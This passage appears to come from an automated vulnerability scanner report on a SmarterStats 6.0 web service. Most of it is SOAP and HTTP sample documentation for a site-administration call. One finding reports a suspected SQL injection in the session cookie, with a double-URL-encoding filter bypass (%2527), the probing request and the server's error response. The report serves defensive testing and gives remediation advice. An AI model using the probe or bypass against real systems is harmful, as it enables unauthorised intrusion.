<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

2.6. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ASP.NET_SessionId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%2527; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:35:31 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
